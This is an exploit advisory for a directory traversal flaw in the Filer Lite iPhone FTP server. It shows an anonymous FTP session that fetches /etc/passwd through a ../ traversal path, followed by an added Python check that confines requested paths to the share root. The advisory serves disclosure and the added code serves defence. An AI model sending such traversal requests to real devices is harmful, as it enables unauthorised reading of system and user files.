Filer Lite version 2.1.0 for iPhone / iPod Touch suffers from a directory traversal vulnerability.
# Exploit Title: Filer Lite v2.1.0 for iPhone / iPod touch, Directory Traversal
# Date: 02/24/2011
# Author: R3d@l3rt, Sp@2K, Sunlight, H@ckk3y
# Software Link : http://itunes.apple.com/kr/app/filer-lite-download-view-manage/id350939597?mt=8
# Version: 2.1.0
# Tested on: iPhone, iPod 3GS with 4.2.1 firmware
# There is a directory traversal vulnerability in Filer Lite.
# Exploit Testing
C:\>ftp
ftp> open 192.168.0.70 2121
Connected to 192.168.0.70.
220 DiddyFTP server ready.
User (192.168.0.70:(none)): anonymous
331 Password required for anonymous
Password:
230 User anonymous logged in.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for '/bin/ls'.
total 1
drwxr-xr-x 2 mobile mobile 136 Feb 24 15:42 Filer Help Files
226 Transfer complete.
ftp: 81 bytes received in 0.00Seconds 81000.00Kbytes/sec.
ftp> get ../../../../../etc/passwd
200 PORT command successful.
150 Opening BINARY mode data connection for '../../../../../etc/passwd'.
226 Transfer complete.
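
Added example, not part of the original advisory and not Filer Lite's or DiddyFTP's code: one way an FTP server can confine a client-supplied path to its shared root, so that the `get ../../../../../etc/passwd` request in the session above is refused. The names `resolve_in_root`, `PathEscapeError` and `demo`, and the temporary directory layout, are assumptions made for illustration.

```python
import os
import tempfile


class PathEscapeError(Exception):
    """Raised when a client-supplied path resolves outside the FTP root."""


def resolve_in_root(root, cwd, requested):
    """Map the argument of RETR/STOR/CWD to a real path confined to `root`.

    root is the shared directory, cwd the client's virtual directory ("/"
    at login), requested the raw path string sent by the client.
    """
    if "\x00" in requested:
        raise PathEscapeError("NUL byte in path")
    root_real = os.path.realpath(root)
    # An absolute FTP path is relative to the virtual root, not the device's /.
    virtual = requested if requested.startswith("/") else os.path.join(cwd, requested)
    candidate = os.path.join(root_real, virtual.lstrip("/"))
    # realpath collapses ".." and follows symlinks before the comparison.
    resolved = os.path.realpath(candidate)
    if os.path.commonpath([root_real, resolved]) != root_real:
        raise PathEscapeError("path escapes FTP root: %r" % requested)
    return resolved


def demo():
    """Run the check over a constructed share; returns {request: outcome}."""
    outcomes = {}
    with tempfile.TemporaryDirectory() as base:
        root = os.path.join(base, "share")              # constructed FTP root
        os.makedirs(os.path.join(root, "Filer Help Files"))
        secret = os.path.join(base, "secret.txt")       # file outside the root
        open(secret, "w").close()
        os.symlink(secret, os.path.join(root, "link"))  # symlink leaving the root
        for req in ("Filer Help Files", "../../../../../etc/passwd",
                    "/../secret.txt", "link"):
            try:
                resolve_in_root(root, "/", req)
                outcomes[req] = "allowed"
            except PathEscapeError:
                outcomes[req] = "refused"
    return outcomes


if __name__ == "__main__":
    for request, outcome in demo().items():
        print("%-30s %s" % (request, outcome))
```

A server using this check would answer a refused request with a 550 reply instead of opening the data connection.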